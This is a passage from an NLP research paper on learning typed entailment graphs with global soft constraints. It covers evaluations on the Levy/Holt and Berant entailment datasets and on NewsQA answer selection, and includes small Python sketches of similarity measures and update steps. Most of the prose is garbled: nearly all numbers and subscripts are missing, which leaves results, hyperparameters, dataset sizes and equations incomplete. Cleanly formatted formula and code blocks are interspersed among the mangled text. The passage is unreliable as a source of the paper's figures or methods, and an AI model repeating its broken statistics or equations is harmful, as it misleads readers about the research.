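    den = sum(u.values()) + sum(v.values())
    return num / den if den else 0.0

def coverage(u, v):
    """directional inclusion of u's features among v's (weeds-style precision)."""
    den = sum(u.values())
    return sum(w for f, w in u.items() if f in v) / den if den else 0.0

def binc(u, v):
    """balanced inclusion: geometric mean of a symmetric and a directional score."""
    return math.sqrt(lin(u, v) * coverage(u, v))
```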
we denote by v̄ (t , t ) the set of typed predicates p(:t , :t ), where t , t ∈ t and p ∈ p . each p(:t , :t ) ∈ v̄ (t , t ) takes as input arguments of types t and t . an example of a typed predicate is win , (:team,:event) that can be instantiated with win , (seahawks:team,super bowl:event). we define v (t , t ) = v̄ (t , t ) ∪ v̄ (t , t ). we often denote elements of v (t , t ) by i, j and k, where each element is a typed predicate as above. for an i=p(:t , :t ) ∈ v (t , t ), we denote by π(i)=p, τ (i)=t and τ (i)=t . we compute distributional similarities between predi- cates with the same argument types. we denote by w (t , t ) ∈ [ , ]|v (t ,t )|×|v (t ,t )| the (sparse) matrix containing all local similarity scores w ij between predicates i and j with types t and t , where |v (t , t )| is the size of v (t , t ). predicates can entail each other with the same argument order (direct) or in the reverse order, i.e., p(:t , :t ) might entail q(:t , :t ) or q(:t , :t ). for the graphs with the same types (e.g., t =t =person), we keep two copies of the pred- icates one for each of the possible orderings. this allows us to model entailments with reverse argu- ment orders, e.g., is son of , (:person ,:person ) → is parent of , (:person ,:person ). we define v = ⋃ t ,t v (t , t ), the set of all typed predicates, and w as a block- diagonal matrix consisting of all the local sim- ilarity matrices w (t , t ). similarly, we de- fine w(t , t ) and w as the matrices consisting of globally consistent similarity scores wij we wish to learn. the global similarity scores are used to form entailment graphs by thresholding w. for a δ > , we define typed entailment graphs as gδ(t , t ) = ( v (t , t ),eδ(t , t ) ) , where v (t , t ) are the nodes and e(t , t ) = {(i,j)|i,j ∈ v (t , t ),wij ≥ δ} are the edges of the entailment graphs. . learning algorithm existing approaches to learn entailment graphs from text miss many correct edges because of data sparsity, i.e., the lack of explicit evidence in the corpus that a predicate i entails another predicate j. the goal of our method is to use evidence for each similarity measure, we define one separate ma- trix and run the learning algorithm separately, but for simplic- ity of notation, we do not show the similarity measure names. t =living_thing,t =diseaset =government_agency,t =event !(trigger,(t ,t ),(t ,t )) t =medicine,t =disease(b) treat cause cure useful for trigger cause trigger (a) figure : learning entailments that are consistent (a) across different but related typed entailment graphs and (b) within each graph. ≤ β ≤ determines how much different graphs are related. the dotted edges are missing, but will be recovered by considering relation- ships shown by across-graph (red) and within-graph (light blue) connections. from the existing edges that have been assigned high confidence to predict missing ones, and re- move spurious edges. we propose two global soft constraints that maintain structural similarity both across and within each typed entailment graph. the constraints are based on the following two ob- servations. first, it is standard to learn a separate typed en- tailment graph for each (plausible) type-pair be- cause arguments provide necessary disambigua- tion for predicate meaning (berant et al., , ; lewis and steedman, a,b; berant et al., ). however, many entailment relations for which we have direct evidence only in a few sub- graphs may in fact apply over many others (fig- ure a). 
for example, we may not have found direct evidence that mentions of a living_thing (e.g., a virus) triggering a disease are accompanied by mentions of the living_thing causing that disease (because of data sparsity), whereas we have found that mentions of a government_agency triggering an event are reliably accompanied by mentions of causing that event. while we show that typing is necessary to learning entailments (§ ), we propose to learn all typed entailment graphs jointly.

second, we encourage paraphrase predicates (where i→j and j→i) to have the same patterns of entailment (figure b), i.e. to entail and be entailed by the same predicates, global soft constraints that we call paraphrase resolution. using these soft constraints, a missing entailment (e.g., medicine treats disease → medicine is useful for disease) can be identified by considering the entailments of a paraphrase predicate (e.g., medicine cures disease → medicine is useful for disease).

the objective function to jointly learn the global scores w and the compatibility function β, given local scores w⁰, is (figure ):

\[
J(W \geq 0,\ \vec{\beta} \geq \vec{0}) \;=\; L_{\mathrm{withinGraph}} + L_{\mathrm{crossGraph}} + L_{\mathrm{pResolution}} + \lambda_1 \lVert W \rVert_1
\]
\[
L_{\mathrm{withinGraph}} \;=\; \sum_{i,j \in V} \bigl(w_{ij} - w^{0}_{ij}\bigr)^2
\]
\[
L_{\mathrm{crossGraph}} \;=\; \sum_{i,j \in V} \sum_{(i',j') \in N(i,j)} \beta\bigl(\pi(i), (\tau_1(i),\tau_2(i)), (\tau_1(i'),\tau_2(i'))\bigr)\,\bigl(w_{ij} - w_{i'j'}\bigr)^2 \;+\; \lambda_2 \lVert \vec{1} - \vec{\beta} \rVert^2
\]
\[
L_{\mathrm{pResolution}} \;=\; \sum_{t_1,t_2 \in T} \;\sum_{\substack{i,j,k \in V(t_1,t_2)\\ k \neq i,\ k \neq j}} I_\epsilon(w_{ij})\, I_\epsilon(w_{ji}) \bigl[ (w_{ik} - w_{jk})^2 + (w_{ki} - w_{kj})^2 \bigr]
\]

lwithingraph encourages global and local scores to be close; lcrossgraph encourages similarities to be consistent between different typed entailment graphs; lpresolution encourages paraphrase predicates to have the same pattern of entailment. we use an ℓ1 regularization penalty to remove entailments with low confidence.

sharing entailments across different typed entailment graphs is only semantically correct for some predicates and types. in order to learn when we can generalize an entailment from one graph to another, we define a compatibility function β : p × (t×t) × (t×t) → [0,1]. the function is defined for a predicate and two type pairs (figure a). it specifies the extent of compatibility for a single predicate between different typed entailment graphs, with 1 being completely compatible and 0 being irrelevant. in particular, β(p, (t1,t2), (t′1,t′2)) determines how much we expect the outgoing edges of p(:t1,:t2) and p(:t′1,:t′2) to be similar. we constrain β to be symmetric between t1,t2 and t′1,t′2, as the compatibility of the outgoing edges of p(:t1,:t2) with p(:t′1,:t′2) should be the same as that of p(:t′1,:t′2) with p(:t1,:t2). we denote by β a vectorization consisting of the values of β for all possible input predicates and types.

note that the global similarity scores w and the compatibility function β are not known in advance. given local similarity scores w⁰, we learn w and β jointly. we minimize the loss function defined above, which consists of the three soft constraints described below and an ℓ1 regularization term.

lwithingraph encourages the global scores wij to be close to the local scores w⁰ij, so that the global scores will not stray too far from the original scores.

lcrossgraph encourages each predicate's entailments to be similar across typed entailment graphs (figure a) if the predicates have similar neighbors. we penalize the difference of entailments in two different graphs when the compatibility function is high.
for each pair of typed predicates (i,j) ∈ v (t , t ), we define a set of neighbors (predicates with different types): n(i,j) = { (i′,j′) ∈ v (t′ , t ′ )|t ′ , t ′ ∈ t, (i′,j′) = (i,j),π(i) = π(i′),π(j) = π(j′), a(i,j) = a(i′,j′) } , ( ) where a(i,j) is true if the argument orders of i and j match, and false otherwise. for each (i′,j′) ∈ n(i,j), we penalize the difference of entailments by adding the term β(·)(wij − wi′j′ ) . we add a prior term on ~β as λ ‖~ −~β‖ , where ~ is a vector of the same size as ~β with all s. without the prior term (i.e., λ = ), all the elements of ~β will be- come zero. increasing λ will keep (some of the) elements of ~β non-zero and encourages communi- cations between related graphs. lpresolution. eq. denotes the paraphrase reso- lution global soft constraints that encourage para- phrase predicates to have the same patterns of en- tailments (figure b). the function iε(x) equals x if x > ε and zero, otherwise. unlike lcrossgraph in eq. , eq. operates on the edges within each graph. if both wij and wji are high, their incoming and outgoing edges from/to nodes k are encour- aged to be similar. we name this global constraint, in our experiments, we set ε = . . smaller values of ε yield similar results, but learning is slower. paraphrase resolution, since it might add missing links (e.g., i→k) if i and j are paraphrases of each other and j→k, or break the paraphrase relation, if the incoming and outgoing edges are very dif- ferent. we impose an ` penalty on the elements of w as λ ‖w‖ , where λ is a nonnegative tuning hyperparameter that controls the strength of the penalty applied to the elements of w. this term removes entailments with low confidence from the entailment graphs. note that eq. has w and average of w across different typed entailment graphs (§ . ) as its special cases. the former is achieved by setting λ =λ = and ε= and the lat- ter by λ = , λ =∞ and ε= . we do not explicitly weight the different components of the loss func- tion, as the effect of lcrossgraph and lpresolution can be controlled by λ and ε, respectively. eq. can be interpreted as an inference prob- lem in a markov random field (mrf) (kinder- mann and snell, ), where the nodes of the mrf are the global scores wij and the parame- ters β ( p, (t , t ), (t ′ , t ′ ) ) . the mrf will have five log-linear factor types: one unary factor type for lwithingraph, one three-variable factor type for the first term of lcrossgraph and a unary factor type for the prior on ~β, one four-variable factor type for lpresolution and a unary factor type for the ` regularization term. figure shows an example factor graph (unary factors are not shown for sim- plicity). we learn w and ~β jointly using a message passing approach based on the block coordinate descent method (xu and yin, ) . we ini- tialize w = w . assuming that we know the global similarity scores w, we learn how much the entailments are compatible between different types (~β) and vice versa. given w fixed, each wij sends messages to the corresponding β(·) el- ements, which will be used to update ~β. given ~β fixed, we do one iteration of learning for each wij. each β(·) and wij elements send messages to the related elements in w, which will be in turn up- dated. based on the update rules (appendix a), we always have wij ≤ and ~β ≤~ . 
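a much-simplified sketch of the style of update used here: each coordinate of w minimizes a quadratic-plus-ℓ1 objective given the other scores and (here fixed) compatibility weights, which yields a soft-thresholded weighted average clipped to [0, 1]. the paraphrase-resolution term and the β updates of appendix a are omitted, and the variable names are ours; see appendix a for the actual update rules.

```python
def update_w(w, w0, neighbors, beta, lam1):
    """one sweep of coordinate updates on the global scores.

    deliberately simplified: only the within-graph pull toward the local
    score, a cross-graph pull toward neighbor scores with fixed compatibility
    weights, and an l1 penalty are kept.  each coordinate minimizer is a
    soft-thresholded weighted average, clipped to [0, 1]."""
    for key, local in w0.items():
        nbrs = neighbors.get(key, [])
        c = local + sum(beta[n] * w[n] for n in nbrs)    # quadratic pull terms
        tau = 1.0 + sum(beta[n] for n in nbrs)           # total quadratic weight
        w[key] = min(1.0, max(0.0, (c - lam1) / tau))    # soft-threshold, clip
    return w

# toy example: the same predicate pair in two typed graphs, one well attested
w0 = {("trigger->cause", "gov_agency,event"): 0.8,
      ("trigger->cause", "living_thing,disease"): 0.1}
neighbors = {("trigger->cause", "gov_agency,event"): [("trigger->cause", "living_thing,disease")],
             ("trigger->cause", "living_thing,disease"): [("trigger->cause", "gov_agency,event")]}
beta = {("trigger->cause", "gov_agency,event"): 0.5,
        ("trigger->cause", "living_thing,disease"): 0.5}
w = dict(w0)
for _ in range(20):
    w = update_w(w, w0, neighbors, beta, lam1=0.05)
print(w)   # the poorly attested graph's score is pulled up toward the other one
```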
each iteration of the learning method takes o ( ‖w‖ |t| + ∑ i∈v (‖wi:‖ +‖w:i‖ ) ) time, where ‖w‖ is the number of nonzero elements of w (number of edges in the current graph), |t| is the number of types and ‖wi:‖ (‖w:i‖ ) is the number of nonzero elements of the ith row (col- umn) of the matrix (out-degree and in-degree of the node i). in practice, learning converges af- ter iterations of full updates. the method is highly parallelizable, and our efficient implemen- tation does the learning in only a few hours. experimental setup we extract binary relations from a multiple-source news corpus (§ . ) and compute local and global scores. we form entailment graphs based on the similarity scores and test our model on two entail- ment rules datasets (§ . ). we then discuss pa- rameter tuning (§ . ) and baseline systems (§ . ). . training corpus: multiple-source news we use the multiple-source newsspike corpus of zhang and weld ( ). newsspike was deliber- ately built to include different articles from differ- ent sources describing identical news stories. they scraped rss news feeds from january-february and linked them to full stories collected through a web search of the rss titles. the cor- pus contains k news articles ( m sentences). since this corpus contains multiple sources cover- ing the same events, it is well-suited to our purpose of learning entailment and paraphrase relations. we extracted m binary relations using the procedure in section . . in our experiments, we used two cutoffs within each typed subgraph to re- duce the effect of noise in the corpus: ( ) remove any argument-pair that is observed with less than c = unique predicates; ( ) remove any predi- cate that is observed with less than c = unique argument-pairs. this leaves us with |p |= k unique predicates in entailment graphs. the maximum graph size is k nodes and the to- tal number of non-zero local scores in all graphs is m. in the future, we plan to test our method on an even larger corpus, but preliminary exper- iments suggest that data sparsity will persist re- gardless of the corpus size, due to the power law distribution of the terms. we compared our ex- tractions qualitatively with stanford open ie (et- zioni et al., ; angeli et al., ). our ccg- based extraction generated noticeably better rela- in our experiments, the total number of edges is ≈ . |v | and most of predicate pairs are seen in less than subgraphs, instead of |t| . there are graphs with more than k nodes, graphs with k to k nodes, and graphs with k to k nodes. tions for longer sentences with long-range depen- dencies such as those involving coordination. . evaluation entailment datasets levy/holt’s entailment dataset levy and da- gan ( ) proposed a new annotation method (and a new dataset) for collecting relational in- ference data in context. their method removes a major bias in other inference datasets such as zeichner’s (zeichner et al., ), where candi- date entailments were selected using a directional similarity measure. levy & dagan form ques- tions of the type which city (qtype), is located near (qrel), mountains (qarg)? and provide possible an- swers of the form kyoto (aanswer), is surrounded by (arel), mountains (aarg). annotators are shown a question with multiple possible answers, where aanswer is masked by qtype to reduce the bias to- wards world knowledge. if the annotator indicates the answer as true (false), it is interpreted that the predicate in the answer entails (does not entail) the predicate in the question. 
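stepping back to the corpus preprocessing described above, the two noise cutoffs can be sketched as a simple filtering pass over the extracted (predicate, argument-pair) tuples. the function below is our own reading (the filters applied once, in this order); the paper gives the concrete cutoff values but does not say whether the filters are iterated.

```python
from collections import defaultdict

def apply_cutoffs(extractions, c1, c2):
    """filter noisy extractions inside one typed subgraph.

    extractions: iterable of (typed_predicate, argument_pair) tuples.
    c1: drop argument-pairs observed with fewer than c1 unique predicates.
    c2: drop predicates observed with fewer than c2 unique argument-pairs.
    applying the two filters once, in this order, is one plausible reading."""
    preds_per_arg = defaultdict(set)
    for pred, args in extractions:
        preds_per_arg[args].add(pred)
    kept = [(p, a) for p, a in extractions if len(preds_per_arg[a]) >= c1]

    args_per_pred = defaultdict(set)
    for pred, args in kept:
        args_per_pred[pred].add(args)
    return [(p, a) for p, a in kept if len(args_per_pred[p]) >= c2]
```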
while the levy entailment dataset removes bias, a recent evaluation identified high labeling error rate for entailments that hold only in one di- rection (holt, ). holt analyzed positive examples and showed that % of the claimed en- tailments are correct only in the opposite direc- tion, while % do not entail in any direction. holt ( ) designed a task to crowd-annotate the dataset by a) adding the reverse entailment (q→a) for each original positive entailment (a→q) in levy’s dataset; and b) directly asking the an- notators if a positive example (or its reverse) is an entailment or not (as opposed to relying on a factoid question). we test our method on this re- annotated dataset of , examples ( , pos- itive and , negative), which we refer to as levy/holt. we run our ccg based binary rela- tion extraction on the examples and perform our typing procedure (§ . ) on aanswer (e.g., kyoto) and aarg (e.g., mountains) to find the types of the arguments. we split the re-annotated dataset into dev ( %) and test ( %) such that all the exam- ples with the same qtype and qrel are assigned to only one of the sets. berant’s entailment dataset berant et al. ( ) annotated all the edges of typed entail- ment graphs based on the predicates in their cor- pus. the dataset contains , edges (positive), www.github.com/xavi-ai/relational-implication-dataset and , non-edges (negative). we evaluate our method on all the examples of berant’s entailment dataset. the types of this dataset do not match with figer types, but we perform a simple hand- mapping between their types and figer types. . parameter tuning we selected λ =. and ε=. based on prelim- inary experiments on the dev set of levy/holt’s dataset. the hyperparameter λ is selected from { , . , . , . , , . , , ,∞}. we do not tune λ for berant’s dataset. we instead use the selected value based on the levy/holt dev set. in all our experiments, we remove any local score w ij < . . we show precision-recall curves by changing the threshold δ on the similarity scores. . comparison we test our model by ablation of the global soft constraints lcrossgraph and lpresolution, testing simple baselines to resolve sparsity and compar- ing to the state-of-the-art resources. we also com- pare with two distributional approaches that can be used to predict predicate similarity. we com- pare the following models and resources. cg_pr is our novel model with both global soft constraints lcrossgraph and lpresolution. cg is our model without lpresolution. local is the lo- cal distributional similarities without any change. avg is the average of local scores across all the entailment graphs that contain both predicates in an entailment of interest. we set λ = ∞ which forces all the values of ~β to be , hence resulting in a uniform average of local scores. untyped scores are local scores learned without types. we set the cutoffs c = and c = to have a graph with total number of edges similar to the typed entail- ment graphs. conve scores are cosine similarities of low- dimensional predicate representations learned by conve (dettmers et al., ), a state-of-the-art model for link prediction. conve is a multi-layer convolutional network model that is highly pa- rameter efficient. we learn -dimensional vec- tors for each predicate (and argument) by apply- ing conve to the set of extractions of the above untyped graph. 
we learned embeddings for each predicate and its reverse to handle examples where the argument order of the two predicates are differ- mappings in total (e.g., animal to living_thing). the selected value was usually around . . ent. additionally, we tried transe (bordes et al., ), another link prediction method which de- spite of its simplicity, produces very competitive results in knowledge base completion. however, we do not present its full results as they were worse than conve. ppdb is based on the paraphrase database (ppdb) of pavlick et al. ( ). we accept an example as entailment if it is labeled as a para- phrase or entailment in the ppdb xl lexical or phrasal collections. berant_ilp is based on the entailment graphs of berant et al. ( ). for berant’s dataset, we directly compared our results to the ones reported in berant et al. ( ). for levy/holt’s dataset, we used publicly available entailment rules derived from berant et al. ( ) that gives us one point of precision and recall in the plots. while the rules are typed and can be ap- plied in a context sensitive manner, ignoring the types and applying the rules out of context yields much better results (levy and dagan, ). this is attributable to both the non-standard types used by berant et al. ( ) and also the general data sparsity issue. in all our experiments, we first test a set of rule-based constraints introduced by berant et al. ( ) on the examples before the prediction by our methods. in the experiments on levy/holt’s dataset, in order to maintain compatibility with levy and dagan ( ), we also run the lemma based heuristic process used by them before ap- plying our methods.we do not apply the lemma based process on berant’s dataset in order to com- pare with berant et al’s ( ) reported results di- rectly. in experiments with cg_pr and cg, if the typed entailment graph corresponding to an exam- ple does not have one or both predicates, we resort to the average score between all typed entailment graphs. results and discussion to test the efficacy of our globally consistent en- tailment graphs, we compare them with the base- line systems in section . . we test the effect of approximating transitivity constraints in section we also tried the average of glove embeddings (pen- nington et al., ) of the words in each predicate, but the results were worse than conve. we also tested the largest collection (xxxl) , but the precision was very low on berant’s dataset (below %). we also tested (berant et al., ), but do not report the results as they are very similar. local untyped avg cg cg_pr levy/holt’s dataset binc . . . . . lin . . . . . weed . . . . . conve - . - - - berant’s dataset binc . . . . . lin . . . . . weed . . . . . conve - . - - - table : area under precision-recall curve (for pre- cision > . ) for different variants of similarity mea- sures: local, untyped, avg, crossgraph (cg) and crossgraph + presolution (cg_pr). we report results on two datasets. bold indicates stat significance (see text). . . section . concerns error analysis. . globally consistent entailment graphs we test our method using three distributional similarity measures: weeds similarity (weeds and weir, ), lin similarity (lin, ) and balanced inclusion (binc; szpektor and dagan, ). the first two similarity measures are sym- metric, while binc is directional. figures a and b show precision-recall curves of the differ- ent methods on levy/holt’s and berant’s datasets, respectively, using binc. 
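the precision-recall curves and the auc figures reported in the table come from sweeping the threshold δ over the similarity scores of the dataset examples; the minimal sketch below assumes binary gold labels and one score per example, and leaves the precision floor as a parameter, since only its role (restricting the auc to a precision range) matters here.

```python
def pr_points(scores, gold):
    """(recall, precision) points obtained by sweeping the threshold delta
    over the similarity scores, one point per distinct score value."""
    points = []
    for delta in sorted(set(scores), reverse=True):
        pred = [s >= delta for s in scores]
        tp = sum(p and g for p, g in zip(pred, gold))
        fp = sum(p and not g for p, g in zip(pred, gold))
        fn = sum(not p and g for p, g in zip(pred, gold))
        if tp + fp > 0 and tp + fn > 0:
            points.append((tp / (tp + fn), tp / (tp + fp)))
    return sorted(points)

def auc_above(points, precision_floor):
    """trapezoidal area under the pr curve, restricted to points whose
    precision is above the floor; the exact floor and any normalization
    are details of the paper's evaluation, not reproduced here."""
    pts = [(r, p) for r, p in points if p >= precision_floor]
    return sum((r2 - r1) * (p1 + p2) / 2
               for (r1, p1), (r2, p2) in zip(pts, pts[1:]))
```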
we show the full curve for binc as it is directional and on the development portion of levy/holt’s dataset, it yields better re- sults than weeds and lin. in addition, table shows the area under the precision-recall curve (auc) for all variants of the three similarity measures. note that each method covers a different range of precisions and recalls. we compute auc for precisions in the range [ . , ], because predictions with precision better than random guess are more important for end applications such as question-answering and semantic parsing. for each similarity measure, we tested statistical significance between the methods using bootstrap resampling with k experiments (efron and tibshirani, ; koehn, ). in ta- ble , the best result for each dataset and similarity measure is boldfaced. if the difference of another model with the best result is not significantly dif- ferent with p-value < . , the second model is also boldfaced. weeds similarity is the harmonic average of weeds pre- cision and weeds recall, hence a symmetric measure. (a) pr ec is io n recall recall levy/holt’s dataset berant’s dataset pr ec is io n (d)(c) (b) figure : comparison of globally consistent entailment graphs to the baselines on levy/holt’s (a) and berant’s (b) datasets. the results are compared to graphs learned by forest reducible graph assumption on levy/holts’s (c) and berant’s (d) datasets. among the distributional similarities based on binc, binc_cg_pr outperforms all the other models in both datasets. in comparison to binc score’s auc, we observe more than % im- provement on levy/holt’s dataset and about % improvement on berant’s. given the consistent gains, our proposed model appears to alleviate the data sparsity and the noise inherent to lo- cal scores. our method also outperforms ppdb and berant_ilp on both datasets. the second best performing model is binc_cg, which im- proves the results significantly, especially on be- rant’s dataset, over the binc_avg (auc of . vs . ). this confirms that learning what subset of entailments should be generalized across differ- ent typed entailment graphs (~β) is effective. the untyped models yield a single large entail- ment graph. it contains (noisy) edges that are not found in smaller typed entailment graphs. despite the noise, untyped models for all three similarity measures still perform better than the typed ones in terms of auc. however, they do worse in the high-precision range. for example, binc_untyped is worse than binc for precision > . . the avg models do surprisingly well (only about . to . below cg_pr in terms of auc), but note that only a subset of the typed entailment graphs might have (untyped) predicates p and q of interest (usually not more than typed entailment graphs out of graphs). therefore, the avg models are gen- erally expected to outperform the untyped ones (with only one exception in our experiments), as typing has refined the entailments and averaging just improves the recall. comparison of cg_pr with cg models confirms that explicitly encour- aging paraphrase predicates to have the same pat- terns of entailment is effective. it improves the results for binc score, which is a directional sim- ilarity measure. we also tested applying the para- phrase resolution soft constraints alone, but the differences with the local scores were not statis- tically significant. 
this suggests that the para- phrase resolution is more helpful when similarities are transferred between graphs, as this can cause inconsistencies around the predicates with trans- ferred similarities, which are then resolved by the paraphrase resolution constraints. the results of the distributional representations learned by conve are worse than most other meth- ods. we attribute this outcome to the fact that a) while entailment relations are directional, these methods are symmetric; b) the learned embed- dings are optimized for tasks other than entailment or paraphrase detection; and c) the embeddings are learned regardless of argument types. how- ever, even the binc_untyped baseline outperforms conve, showing that it is important to use a di- rectional measure that directly models entailment. we hypothesize that learning predicate represen- tations based on the distributional inclusion hy- potheses which do not have the above limitations might yield better results. . effect of transitivity constraints our largest graph has k nodes, we thus tested approximate methods instead of the ilp to close entailment relations under transitivity (§ ). the approximate tnf method of berant et al. ( ) did not scale to the size of our graphs with moder- ate sparsity parameters. berant et al. ( ) also present a heuristic method, high-to-low forest reducible graph (htl-frg), which gets slightly better results than tnf on their dataset, and which scales to graphs of the size we work with. we applied the htl-frg method to the globally consistent similarity scores (binc_cg_pr_htl) and changed the threshold on the scores to get a precision-recall curve. figures c and d show the results of this method on levy/holt’s and berant’s datasets. our experiments show, in contrast to the results of berant et al. ( ), that the htl-frg method leads to worse results when applied to our global scores. this result is caused both by the use of heuristic methods in place of globally optimizing via ilp, and by the removal of many valid edges arising from the fact that the frg assumption is not correct for many real-world domains. tnf did not converge after two weeks for threshold δ = . . for δ = . (precisions higher than %), it converged, but with results slightly worse than htl-frg on both datasets. error type example false positive spurious correlation ( %) microsoft released internet ex- plorer → internet explorer was developed by microsoft relation nor- malization ( %) the pain may be relieved by as- pirin → the pain can be treated with aspirin lemma based process & parsing ( %) president kennedy came to texas → president kennedy came from texas false negative sparsity ( %) cape town lies at the foot of mountains → cape town is lo- cated near mountains wrong label & parsing ( %) horses are imported from aus- tralia → horses are native to aus- tralia table : examples of different error categories and relative frequencies. the cause of errors is boldfaced. . error analysis we analyzed false positive (fp) and false negative (fn) randomly selected examples (using binc_cg_st results on levy/holt’s dataset and at the precision level of berant_ilp, i.e. . ). we present our findings in table . most of the fn errors are due to data sparsity, but a few errors are due to wrong labeling of the data and parsing er- rors. more than half of the fp errors are because of spurious correlations in the data that are captured by the similarity scores, but are not judged to con- stitute entailment by the human judges. 
about one third of the fp errors are because of the normal- ization we currently perform on the relations, e.g., we remove modals and auxiliaries. the remain- ing errors are mostly due to parsing and our use of levy and dagan’s ( ) lemma based heuristic process. extrinsic evaluation to further test the utility of explicit entailment rules, we evaluate the learned rules on an ex- trinsic task: answer selection for machine read- ing comprehension on newsqa, a dataset that contains questions about cnn articles (trischler et al., ). machine reading comprehension is usually evaluated by posing questions about a text passage and then assessing the answers of a system (trischler et al., ). the datasets that are used for this task are often in the form of (document,question,answer) triples, where an- the board hailed romney for his solid credentials. who praised mitt romney’s credentials? researchers announced this week that they’ve found a new gene, als , which is responsible for . . . which gene did the als association dis- cover ? one out of every children under years old in america has a food allergy, and some will outgrow their sensitivities. how many americans suffer from food allergies? the reported compromise could itself run afoul of european labor law, opening the way for foreign workers . . . what law might the deal break? . . . barnes & noble ceo william lynch said as he unveiled his company ’s nook tablet on monday. who launched the nook tablet? the report said opium has accounted for more than half of afghanistan ’s gross domestic product in . what makes up half of afghanistans gdp ? table : examples where explicit entailment relations improve the rankings. the related words are boldfaced. swer is a short span of the document. answer selection is an important task where the goal is to select the sentence(s) that contain the answer. we show improvements by adding knowledge from our learned entailments without changing the graphs or tuning them to this task in any way. inverse sentence frequency (isf) is a strong baseline for answer selection (trischler et al., ). the isf score between a sentence si and a question q is defined as isf(si,q) =∑ w∈si∩q idf(w), where idf(w) is the inverse document frequency of the word w by considering each sentence in the whole corpus as one docu- ment. the state-of-the-art methods for answer se- lection use isf and by itself it already does quite well (trischler et al., ; narayan et al., ). we propose to extend the isf score with entail- ment rules. we define a new score isfent(si,q) = αisf(si,q) + ( −α)|{r ∈ si,r ∈ q : r → r }|, where α ∈ [ , ] is a hyper-parameter and r and r denote relations in the sentence and the ques- tion, respectively. the intuition is that if a sen- tence such as “luka modric sustained a fracture to his right fibula” is a paraphrase of or entails the answer of a question such as “what does luka modric suffer from?”, it will contain the answer span. we consider an entailment decision be- tween two typed predicates if their global similar- ity binc_cg_pr is higher than a threshold δ. we also considered entailments between unary relations (one argument) by leveraging our learned binary entailments. we split each binary entail- ment into two potential unary entailments. for example, the entailment visit , (:person,:location) → arrive ,in(:person,:location), is split acc mrr map isf . . . isfent . . . table : results (in percentage) for answer selection on the newsqa dataset. 
into visit (:person) → arrive (:person) and visit (:location) → arrivein(:location). we computed unary similarity scores by averaging over all related binary scores. this is particularly helpful when one argument is not present (e.g., adjuncts or wh questions) or does not exactly match between the question and the answer. we test the proposed answer selection score on newsqa, a dataset that contains questions about cnn articles (trischler et al., ). the dataset is collected in a way that encourages lexical and syntactic divergence between questions and doc- uments. the crowdworkers who wrote questions saw only a news article headline and its summary points, but not the full article. this process en- courages curiosity about the contents of the full article and prevents questions that are simple re- formulations of article sentences (trischler et al., ). this is a more realistic and suitable setting to test paraphrasing and entailment capabilities. we use the development set of the dataset ( samples) to tune α and δ and report results on the test set ( examples) in table . we ob- serve about . % improvement in accuracy (acc) and % improvement in mean reciprocal rank (mrr) and mean average precision (map), con- firming that entailment rules are helpful for an- swer selection. table shows some of the ex- the accuracy results of narayan et al. ( ) are not consistent with their own mrr and map (acc>mrr in come cases), as they break ties between isf scores differ- wij = (cij > λ )(cij −λ )/τij ( ) cij = w ij + ∑ (i′,j′)∈n(i,j) β(·)wi′j′ − (wij > ε)iε(wji) ∑ k∈v (τ (i),τ (i)) [ (wik −wjk) + (wki −wkj) ] + ∑ k∈v (τ (i),τ (i)) iε(wjk)iε(wkj)wik + iε(wik)iε(wki)wkj ( ) τij = + ∑ (i′,j′)∈n(i,j) β(·) + ∑ k∈v (τ (i),τ (i)) iε(wjk)iε(wkj) + iε(wik)iε(wki) ( ) β(·) = i ( − ( ∑ j∈v (τ (i),τ (i)) ∑ (i′,j′)∈n(i,j) (wij −wi′j′ ) ) /λ ) . ( ) figure : the update rules for wij and β(·). amples where isfent ranks the correct sentences higher than isf. these examples are very chal- lenging for methods that do not have entailment and paraphrasing knowledge, and illustrate the se- mantic interpretability of the entailment graphs. we also performed a similar evaluation on the stanford natural language inference dataset (snli; bowman et al., ) and obtained % improvement over a basic neural network archi- tecture that models sentences with an n-layered lstm (conneau et al., ). however, we did not get improvements over the state of the art re- sults because only a few of the snli examples re- quire external knowledge of predicate entailments. most examples require reasoning capabilities such as a∧b → b and simple lexical entailments such as boy → person, which are often present in the training set. conclusions and future work we have introduced a scalable framework to learn typed entailment graphs directly from text. we use global soft constraints to learn globally con- sistent entailment scores for entailment relations. our experiments show that generalizing in this way across different but related typed entail- ment graphs significantly improves performance over local similarity scores on two standard text- entailment datasets. we show around % in- crease in auc on levy/holt’s dataset and % on berant’s dataset. the method also outper- forms ppdb and the prior state-of-the-art entail- ment graph-building approach due to berant et al. ently when computing acc compared to mrr and map. see also http://homepages.inf.ed.ac.uk/scohen/ acl external-errata.pdf. ( ). paraphrase resolution further improves the results. 
we have in addition showed the util- ity of entailment rules on answer selection for ma- chine reading comprehension. in the future, we plan to show that the global soft constraints developed in this paper can be extended to other structural properties of entail- ment graphs such as transitivity. future work might also look at entailment relation learning and link prediction tasks jointly. the entailment graphs can be used to improve relation extrac- tion, similar to eichler et al. ( ), but cover- ing more relations. in addition, we intend to col- lapse cliques in the entailment graphs to para- phrase clusters with a single relation identifier, and to replace the form-dependent lexical semantics of the ccg parser with these form-independent rela- tions (lewis and steedman, a) and to use the entailment graphs to derive meaning postulates for use in tasks such as question-answering and con- struction of knowledge-graphs from text (lewis and steedman, ). appendix a figure shows the update rules of the learning al- gorithm. the global similarity scores wij are up- dated using eq. , where cij and τij are defined in eq. and eq. , respectively. (x) equals if the condition x is satisfied and zero, otherwise. the compatibility functions β(·) are updated using eq. . acknowledgements we thank thomas kober and li dong for help- ful comments and feedback on the work, reg- http://homepages.inf.ed.ac.uk/scohen/acl external-errata.pdf http://homepages.inf.ed.ac.uk/scohen/acl external-errata.pdf gie long for preliminary experiments on ope- nie extractions, and ronald cardenas for provid- ing baseline code for the newsqa experiments. the authors would also like to thank katrin erk and the three anonymous reviewers for their valu- able feedback. this work was supported in part by the alan turing institute under the epsrc grant ep/n / . the experiments were made possible by microsoft’s donation of azure cred- its to the alan turing institute. the research was supported in part by erc advanced fellow- ship ga semantax, a google faculty award, a bloomberg l.p. gift award, and a uni- versity of edinburgh/huawei technologies award to steedman. chambers was supported in part by the national science foundation under grant iis- . steedman and johnson were sup- ported by the australian research council’s dis- covery projects funding scheme (project number dp ). references omri abend, shay b. cohen, and mark steedman. . lexical inference over multi-word pred- icates: a distributional approach. in proceed- ings of the nd annual meeting of the associa- tion for computational linguistics, pages – . gabor angeli, melvin johnson premkumar, and christopher d. manning. . leveraging linguistic structure for open domain informa- tion extraction. in proceedings of the rd an- nual meeting of the association for computa- tional linguistics, pages – . jonathan berant, noga alon, ido dagan, and ja- cob 